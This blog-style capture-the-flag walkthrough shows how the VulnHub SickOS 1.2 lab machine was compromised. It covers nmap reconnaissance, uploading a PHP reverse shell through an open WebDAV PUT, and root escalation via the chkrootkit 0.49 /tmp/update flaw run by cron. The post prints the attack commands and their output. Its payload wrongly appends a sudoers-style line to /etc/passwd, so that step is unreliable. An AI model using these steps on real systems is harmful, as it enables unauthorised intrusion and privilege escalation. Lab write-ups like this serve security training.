SickOS - VULNHUB - Linux -1.2
Complete walkthrough, of the season content:
RECOGNITION PHASE:
NETWORK DISCOVERY:
We can use a couple of tools in order to make this task, ane of them is arp-scan that use request over arp protocol on broadcast mode, and wait for the hosts response via this type of protocol as you can see below:
The other tool is netdiscover, with the same concept but using an interface like parameter:
NMAP:
On this step, from the attaker machine we recover information about the open ports and services of out target machine. We can use some options in order to execute scripts and obtain information about vulnerabilities on the external host.
nmap -sC -sV -p - -n -v 192.168.1.35 -oN target_nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-21 01:51 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating Ping Scan at 01:51
Scanning 192.168.1.35 [2 ports]
Completed Ping Scan at 01:51, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 01:51
Scanning 192.168.1.35 [65535 ports]
Discovered open port 80/tcp on 192.168.1.35
Discovered open port 22/tcp on 192.168.1.35
Connect Scan Timing: About 19.24% done; ETC: 01:53 (0:02:10 remaining)
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 25.50% done; ETC: 01:53 (0:01:54 remaining)
Connect Scan Timing: About 51.50% done; ETC: 01:53 (0:01:05 remaining)
Completed Connect Scan at 01:53, 112.46s elapsed (65535 total ports)
Initiating Service scan at 01:53
Scanning 2 services on 192.168.1.35
Completed Service scan at 01:53, 6.04s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.35.
Initiating NSE at 01:53
Completed NSE at 01:53, 0.11s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Nmap scan report for 192.168.1.35
Host is up (0.0028s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.95 seconds
The conclusion of nmap scan is that we found the following open ports with the services:
EXPLOITATION:
22 ssh
ssh root@192.168.1.35
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:jltI6lCnaj6Ef0DsVMo1PVZCPyfw1MAba7V9x4mpECc.
Please contact your system administrator.
Add correct host key in /home/kali/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/kali/.ssh/known_hosts:9
remove with:
ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.168.1.35"
ECDSA host key for 192.168.1.35 has changed and you have requested strict checking.
Host key verification failed.
80 http
Image metadata:
kali@kali:~/VULNHUB/SICKOS1.2/data$ exiftool blow.jpg
ExifTool Version Number : 12.09
File Name : blow.jpg
Directory : .
File Size : 46 kB
File Modification Date/Time : 2016:04:26 08:37:36+02:00
File Access Date/Time : 2021:08:21 02:04:15+02:00
File Inode Change Date/Time : 2021:08:21 02:04:15+02:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 551
Image Height : 559
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 551x559
Megapixels : 0.308
It seems that the image hasn't hidden content, in that case we are going to crawl the web server on the target ip:
And the web server contains a test directory context:
That directory is empty, but allow you upload content powered by lighttpd:
curl -X OPTIONS http://192.168.1.35/test -v
* Trying 192.168.1.35:80...
* Connected to 192.168.1.35 (192.168.1.35) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.1.35
> User-Agent: curl/7.72.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.1.35/test/
< Content-Length: 0
< Date: Sat, 21 Aug 2021 10:14:20 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.1.35 left intact
Put operation :
kali@kali:~/VULNHUB/SICKOS1.2/scripts$ curl -X PUT --data-binary "`cat ./php-reverse-shell.php`" http://192.168.1.35/test/reverse-shell.php -v
* Trying 192.168.1.35:80...
* Connected to 192.168.1.35 (192.168.1.35) port 80 (#0)
> PUT /test/reverse-shell.php HTTP/1.1
> Host: 192.168.1.35
> User-Agent: curl/7.72.0
> Accept: */*
> Content-Length: 5490
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 5490 out of 5490 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Length: 0
< Date: Sat, 21 Aug 2021 05:08:42 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.1.35 left intact
And obtain reverse shell:
PRIVILEGE ESCALATION
With Linux-exploit-suggester we found that the target host, could be vulnerable to dirtycow exploit:
But the target machine, init a restart process when we execute the exploit ;(. So we are going to review the OS content with the lse.sh script:
And as you can see on the previous image, the Operative system is executed as a root a task process invoke by the daily crontab:
$ ls -ltrh /etc/cron.daily | grep chkroot
-rwxr-xr-x 1 root root 2.0K Jun 4 2014 chkrootkit
every minute:
$ chkrootkit -V
chkrootkit version 0.49
And this version is vulnerable to privilege escalation:
So, this is the escalation process:
The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
In order to exploit the vulnerability, we create a new file named update on /tmp directory with the following content:
www-data@ubuntu:/tmp$ echo ' whoami > /tmp/user; echo "www-data ALL=(ALL) NOPASSWD: ALL" >> /etc/passwd ' > /tmp/update
< "www-data ALL=(ALL) NOPASSWD: ALL" >> /etc/passwd ' > /tmp/update
Test the update script:
www-data@ubuntu:/tmp$ ./update
./update
./update: line 1: /etc/passwd: Permission denied
www-data@ubuntu:/tmp$ ls -ltrh
ls -ltrh
total 20K
-rw------- 1 www-data www-data 0 Aug 21 02:24 tmp.wV6wQqCjXQ
-rw------- 1 www-data www-data 0 Aug 21 02:24 tmp.Oj5cO0PhT2
-rwxrwxrwx 1 www-data www-data 77 Aug 21 02:46 update
-rw-rw-rw- 1 www-data www-data 9 Aug 21 02:47 user
srwxr-xr-x 1 www-data www-data 0 Aug 21 2021 php.socket-0
drwxrwxrwt 2 root root 4.0K Aug 21 2021 VMwareDnD
drwx------ 2 root root 4.0K Aug 21 2021 vmware-root
-rw-r--r-- 1 root root 1.6K Aug 21 2021 vgauthsvclog.txt.0
www-data@ubuntu:/tmp$ cat user
cat user
www-data
After cron execution:
www-data@ubuntu:/tmp$ ls -ltrh
ls -ltrh
total 20K
-rw------- 1 www-data www-data 0 Aug 21 02:24 tmp.wV6wQqCjXQ
-rw------- 1 www-data www-data 0 Aug 21 02:24 tmp.Oj5cO0PhT2
-rwxrwxrwx 1 www-data www-data 77 Aug 21 02:46 update
-rw-rw-rw- 1 www-data www-data 5 Aug 21 02:48 user
srwxr-xr-x 1 www-data www-data 0 Aug 21 2021 php.socket-0
drwxrwxrwt 2 root root 4.0K Aug 21 2021 VMwareDnD
drwx------ 2 root root 4.0K Aug 21 2021 vmware-root
-rw-r--r-- 1 root root 1.6K Aug 21 2021 vgauthsvclog.txt.0
www-data@ubuntu:/tmp$ cat user
cat user
root
And we obtain execution privileges such a root user:
No comments:
Post a Comment